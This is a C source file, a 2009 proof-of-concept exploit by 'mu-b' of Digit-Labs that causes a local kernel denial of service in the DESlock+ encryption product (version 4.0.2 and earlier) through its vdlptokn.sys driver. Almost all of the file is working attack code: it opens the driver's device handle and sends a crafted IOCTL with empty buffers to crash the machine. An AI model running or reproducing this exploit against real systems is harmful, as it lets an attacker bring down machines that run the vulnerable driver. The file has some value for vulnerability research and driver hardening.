/* deslock-vdlptokn-v2.c
 *
 * Copyright (c) 2009 by <mu-b@digit-labs.org>
 *
 * DESlock+ <= 4.0.2 local kernel DoS POC
 * by mu-b - Wed 17 Jun 2009
 *
 * - Tested on: vdlptokn.sys 1.0.3.54
 *
 * Compile: MinGW + -lntdll
 *
 * - this exploit is provided for educational purposes _only_. You are free
 *   to use this code in any way you wish provided you do not work for, or
 *   are associated in any way with Portcullis Computer Security Ltd.
 *
 *    - Private Source Code -DO NOT DISTRIBUTE -
 * http://www.digit-labs.org/ -- Digit-Labs 2009!@$!
 */

#include <stdio.h>
#include <stdlib.h>

#include <windows.h>

#define VDLPTOKN_IOCTL    0x002220C1

int
main (int argc, char **argv)
{
  DWORD rlen;
  HANDLE hFile;
  BOOL result;

  printf ("DESlock+ <= 4.0.2 local kernel DoS PoC\n"
          "by: <mu-b@digit-labs.org>\n"
          "http://www.digit-labs.org/ -- Digit-Labs 2009!@$!\n\n");

  fflush (stdout);
  hFile = CreateFileA ("\\\\.\\DLPTokenWalter0", FILE_EXECUTE,
                       FILE_SHARE_READ|FILE_SHARE_WRITE, NULL,
                       OPEN_EXISTING, 0, NULL);
  if (hFile == INVALID_HANDLE_VALUE)
    {
      fprintf (stderr, "* CreateFileA failed, %d\n", hFile);
      exit (EXIT_FAILURE);
    }

  result = DeviceIoControl (hFile, VDLPTOKN_IOCTL,
                            NULL, 0, NULL, 0, &rlen, 0);
  if (!result)
    {
      fprintf (stderr, "* DeviceIoControl failed\n");
      exit (EXIT_FAILURE);
    }

  printf ("* hmmm, you didn't STOP the box?!?!\n");

  CloseHandle (hFile);

  return (EXIT_SUCCESS);
}